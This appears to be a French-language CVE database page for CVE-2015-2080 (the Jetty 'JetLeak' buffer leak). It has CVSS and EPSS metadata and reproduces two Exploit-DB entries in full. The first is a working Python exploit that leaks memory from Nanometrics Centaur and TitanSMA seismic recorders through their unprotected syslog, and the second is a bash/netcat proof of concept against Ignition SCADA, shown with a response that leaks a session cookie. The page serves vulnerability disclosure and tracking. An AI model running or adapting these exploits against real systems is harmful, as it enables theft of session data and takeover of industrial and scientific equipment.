Faiblesses connexes
| CWE-ID |
Nom de la faiblesse |
Source |
| CWE-200 |
Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
|
Métriques
| Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
| V3.0 |
7.5 |
HIGH |
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is no impact to availability within the impacted component. Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics
|
nvd@nist.gov |
| V2 |
5 |
|
AV:N/AC:L/Au:N/C:P/I:N/A:N |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 48098
Date de publication : 2020-02-18 23h00 +00:00
Auteur : byteGoblin
EDB Vérifié : No
# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak
# Date: 2020-02-15
# Author: byteGoblin
# Vendor: https://www.nanometrics.ca
# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
# CVE: N/A
#
# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
#
#
# Vendor: Nanometrics Inc.
# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
#
# Affected versions:
# Centaur <= 4.3.23
# TitanSMA <= 4.2.20
#
# Summary:
# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and
# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
# infrasound and similar geophysical sensor recording applications requiring sample rates up to
# 5000 sps.
#
# Summary:
# The TitanSMA is a strong motion accelerograph designed for high precision observational and
# structural engineering applications, where scientists and engineers require exceptional dynamic
# range over a wide frequency band.
#
# Description:
# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent
# packet) which can be combined to leak sensitive data which can be used to perform session hijacking
# and authentication bypass scenarios.
#
# Tested on:
# Jetty 9.4.z-SNAPSHOT
#
# Vulnerability discovered by:
# byteGoblin @ zeroscience.mk
#
#
# Advisory ID: ZSL-2020-5562
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
#
# Related CVE: CVE-2015-2080
# Related CWE: CWE-532, CWE-538
#
# 10.02.2020
#
#!/usr/bin/env python3
import requests
import re
import sys
class Goblin:
def __init__(self):
self.host = None
self.page = "/zsl"
self.syslog = "/logs/syslog"
self.buffer_pad = "A" * 70
self.buffer = None
self.payload = "\xFF"
self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results
self.body = {}
self.headers = None
self.syslog_data = {}
self.last_line = None
self.before_last_line = True
def banner(self):
goblin = """
NN
NkllON
0;;::k000XN KxllokN
0;,:,;;;;:ldK Kdccc::oK
Nx,';codddl:::dkdc:c:;lON
klc:clloooooooc,.':lc;'lX
x;:ooololccllc:,:ll:,:xX
Kd:cllc'..';:ccclc,.x _ . ___ _ .
NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __
Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `.
0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |
0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / |
Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/
Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//
XxclkXk;'::,,,''';:::;'''...'',:o0
Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin
O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk
Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K
d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca
Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA
d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20
0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK
0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A
0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0
x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product
Xx:,'':xk:..,''lK Y k;';;';xX
XOkkko'.....'O d.';;,,:xN
0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._
XOkkkkkON
"""
print(goblin)
def generate_payload(self, amount_of_bytes):
self.payload += "\x00" * amount_of_bytes
self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}
def read_syslog(self, initial=False):
# Read syslog remotely and filter out 'HeapByteBuffer' messages.
# 'initial' is used to make a 'snapshot' of the state before we send payloads...
# That way we can filter on what we've just sent.
print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
buffer = ""
r = requests.get(self.host + self.syslog)
if r.status_code == 200:
print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
split = r.text.split("\n")
for line in split:
if "HeapByteBuffer" in line:
if initial:
self.last_line = line
else:
if line == self.last_line:
self.before_last_line = False
if not self.before_last_line:
buffer_addr = re.search("\@\w+", line).group(0).strip("@")
try:
leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>")
buffer += leak
except Exception as e:
print(e)
if initial:
return self.last_line
self.buffer = buffer
else: # we can't access syslog?
print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
print("[!!!] - The status code we got was: {}".format(r.status_code))
exit(-1)
def show_output(self):
# we need to translate '\r\n' into actual newlines
if self.buffer is not None and self.buffer is not "":
self.buffer = self.buffer.replace("\\n", "\n")
self.buffer = self.buffer.replace("\\r", "\r")
self.buffer = self.buffer.replace("%2f", "/")
print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
print("=" * 50)
print("[*] THIS IS THE LOOT")
print("=" * 50)
for num, x in enumerate(self.buffer.split("\n")):
print("{}.\t| \t{}".format(num, x))
def send_payload(self, amount):
print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
if amount > self.payloads_to_send or amount < 0:
amount = self.payloads_to_send
for num, x in enumerate(range(0, amount)):
if num % 10 == 0:
print("[!] - [{}/{}] payloads sent...".format(num, amount))
try:
self.generate_payload(17)
r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
except Exception as e:
print(e)
print("[!] - [{}/{}] payloads sent...".format(amount, amount))
def parse_sys_args(self):
if len(sys.argv) >= 2:
self.host = sys.argv[1]
if not "http" in self.host:
self.host = "http://{}".format(self.host)
if len(sys.argv) == 3:
# amount of packets to send
self.payloads_to_send = sys.argv[2]
else:
self.print_help()
def print_help(self):
print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0]))
print("Example: centaur3.py 123.456.789.0:8080 200")
print("\tThis will send 200 payloads to the aforementioned host")
print("\tThe [port] and [amount of payloads] are optional")
exit(-1)
def main(self):
self.parse_sys_args()
self.banner()
ll = self.read_syslog(initial=True)
self.send_payload(70)
self.read_syslog()
self.show_output()
if __name__ == '__main__':
Goblin().main()
Exploit Database EDB-ID : 39455
Date de publication : 2016-02-16 23h00 +00:00
Auteur : LiquidWorm
EDB Vérifié : No
Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java
Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.
Desc: Remote unauthenticated atackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives a HTTP request, the below code is used
to parse through the HTTP headers and their associated values. The server
begins by looping through each character for a given header value and checks
the following:
- On Line 1164, the server checks if the character is printable ASCII or
not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (or less than 0x20), then all
of the checks above are skipped over and the code throws an ëIllegalCharacterí
exception on line 1186, passing in the illegal character and a shared buffer.
---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[..snip..]
1163: case HEADER_VALUE:
1164: if (ch>HttpTokens.SPACE || ch<0)
1165: {
1166: _string.append((char)(0xff&ch));
1167: _length=_string.length();
1168: setState(State.HEADER_IN_VALUE);
1169: break;
1170: }
1171:
1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173: break;
1174:
1175: if (ch==HttpTokens.LINE_FEED)
1176: {
1177: if (_length > 0)
1178: {
1179: _value=null;
1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181: }
1182: setState(State.HEADER);
1183: break;
1184: }
1185:
1186: throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Ubuntu Linux 14.04
Mac OS X
HP-UX Itanium
Jetty(9.2.z-SNAPSHOT)
Java/1.8.0_73
Java/1.8.0_66
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
14.01.2016
---
#######################
#!/bin/bash
#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'
function normalRequest {
echo "-- Normal Request --"
nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63
NORMREQ
}
function badCookie {
echo "-- Bad Cookie --"
nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}
BADCOOKIE
}
normalRequest
echo ""
echo ""
badCookie
#######################
Original raw analysis request via proxy using Referer:
------------------------------------------------------
GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00
Response leaking part of Cookie session:
----------------------------------------
HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)
Products Mentioned
Configuraton 0
Fedoraproject>>Fedora >> Version 22
Configuraton 0
Eclipse>>Jetty >> Version 9.2.3
Eclipse>>Jetty >> Version 9.2.4
Eclipse>>Jetty >> Version 9.2.5
Eclipse>>Jetty >> Version 9.2.6
Eclipse>>Jetty >> Version 9.2.7
Eclipse>>Jetty >> Version 9.2.8
Eclipse>>Jetty >> Version 9.3.0
Eclipse>>Jetty >> Version 9.3.0
Références
